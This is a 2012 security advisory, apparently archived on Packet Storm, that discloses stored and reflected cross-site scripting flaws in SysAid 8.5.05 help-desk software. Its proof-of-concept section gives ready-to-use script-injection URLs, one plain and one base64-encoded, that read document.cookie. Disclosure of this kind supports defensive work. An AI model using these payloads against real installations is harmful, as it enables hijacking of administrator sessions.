Ilient SysAid 8.5.05 Cross Site Scripting

2012-03-08T00:00:00
ID PACKETSTORM:110598
Type packetstorm
Reporter Julien Ahrens
Modified 2012-03-08T00:00:00

Description

                                        
                                            `Title:  
======  
Ilient SysAid v8.5.05 - Multiple Web Vulnerabilities  
  
  
Date:  
=====  
2012-03-08  
  
  
References:  
===========  
http://www.vulnerability-lab.com/get_content.php?id=470  
  
  
VL-ID:  
=====  
470  
  
  
Introduction:  
=============  
SysAid IT Enterprise Edition is an IT management solution that includes a suite of advanced modules to help you manage   
complex processes often found in larger organizations. Specially built to provide you with advanced customization and scalability,   
SysAid IT Enterprise delivers the tools you need to meet any IT challenge - now and in the future.  
  
Core Module(s):  
Help Desk  
Asset Management  
Remote Control  
End-User Web Portal  
My Desktop  
Mobile Application  
Knowledge Base  
Reports & Analysis  
IT Benchmark  
Online Chat  
Calendar & Scheduling  
  
  
Advanced Module(s):  
Server Monitoring  
Tasks and Projects  
Manager Dashboard  
CMDB  
Password Services  
  
  
Enterprise Module(s):  
ITIL Package  
Increased Customization  
API and Advanced Integration  
Multi-Site Support  
SLA/SLM  
  
  
Abstract:  
=========  
A Vulnerability Laboratory Researcher discovered multiple persistent and non-persistent Web Vulnerabilities in Ilients SysAid v8.5.05.  
  
  
Report-Timeline:  
================  
2012-03-08: Public or Non-Public Disclosure  
  
  
Status:  
========  
Published  
  
  
Affected Products:  
==================  
Ilient  
Product: SysAid v8.5.05   
  
  
Exploitation-Technique:  
=======================  
Remote  
  
  
Severity:  
=========  
Medium  
  
  
Details:  
========  
Multiple non-persistent and persistent input validation vulnerabilities are detected on Ilient   
SysAid v8.5.05 and below. The bugs allow remote attackers to implement/inject malicious script   
code on the application side (persistent) and temporarily on the user side (non-persistent).  
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or   
stable (persistent) context manipulation.  
  
1.1  
Vulnerable Module(s): (Persistent)  
  
[+] Name & Information - Profile  
[+] User Management - Listing & Display  
[+] StartPage - Index  
  
Picture(s):  
../1.png  
../2.png  
../3.png  
../4.png  
../5.png  
  
1.2  
Vulnerable Module(s): (Non Persistent)  
  
[+] ViewName  
[+] CustomListView  
[+] srType  
  
Picture(s):  
../6.png  
../7.png  
  
  
Proof of Concept:  
=================  
The vulnerabilities can be exploited by remote attacker with required user inter aciton. For demonstration or reproduce ...  
  
1.1 - Persistent  
All fields in the user-profile are vulnerable which are displayed somewhere on the frontend, like: Phone, Email or Name  
To exploit the issue a user just need to include his own script code on his profile section & start a inter action.  
  
Persistent(Frontpage):  
<tablewidth="100%"cellspacing="5"cellpadding="5"border="0"class="Maxed">  
<tbody><trvalign="top"><tdwidth="50%"style="padding:10px;"id="Container_1"><tableclass="MaxedContainerContainer_1">  
<tbody><tr>  
<tdclass="Container_Header">  
<table>  
<tbody><tr>  
<tdclass="Container_Header_First">  
<tdclass="Container_Header_Center">  
Administratorsonline  
</td><tdclass="Container_Header_Last">  
</td>  
  
</tr>  
</tbody></table></td>  
</tr>  
<tr>  
<tdclass="Container_Body">  
<divclass="BorderFix_FFForm_Ctrl_Label">  
<br/>  
1Users<br/>  
JulienAhrens<EXCUTES PERSISTENT SCRIPt CODE HERE!></div></td></tr></tbody></table></td></tr></tbody>  
</table></div></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></body></html>  
  
  
  
1.2  
Non-persistent XSS:  
http://localhost:8080/sysaid/CustomizeListView.jsp?listName=Assets&listViewName=<script>alert(document.cookie)</script>  
  
or base64 encoded:  
http://localhost:8080/sysaid/CustomizeListView.jsp?listName=Service%20Requests&srType=1&listViewName=@BASE64@PHNjcmlwdD5hb  
GVydChlc2NhcGUoZG9jdW1lbnQuY29va2llKSk8L3NjcmlwdD4=  
  
  
  
Non-persistent(listViewName):  
  
<tdcolspan="6"class="Frame_Body_Center">  
<tablewidth="100%"border="0"class="Maxed">  
  
<tbody><trvalign="top">  
<tdstyle="padding:10px;"id="Conainer_1">  
<tablewidth=""cellspacing="0"cellpadding="0"border="0">  
<tbody><tr>  
<td>  
<tablewidth="100%"cellspacing="0"cellpadding="0"border="0"class="MaxedContainerContainer_1">  
  
<tbody><tr>  
<tdclass="Container_Header">  
  
<table>  
<tbody><tr>  
<tdclass="Container_Header_First"/>  
<tdclass="Container_Header_Center">  
<palign="center"style="font-size:16px;">Customizelist-Assets-<EXCUTES PERSISTENT SCRIPt CODE HERE>   
  
</p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr>  
</tbody></table></td></tr></tbody></table></form></body></html>  
  
  
Risk:  
=====  
The security risk of the vulnerabilities are estimated as medium(-).  
  
  
Credits:  
========  
Vulnerability Research Laboratory - Julien Ahrens (MrTuxracer) [www.inshell.net]  
  
  
Disclaimer:  
===========  
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,   
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-  
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business   
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some   
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation   
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-  
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of   
other media, are reserved by Vulnerability-Lab or its suppliers.  
  
Copyright © 2012|Vulnerability-Lab  
  
  
--   
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com  
Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com  
  
`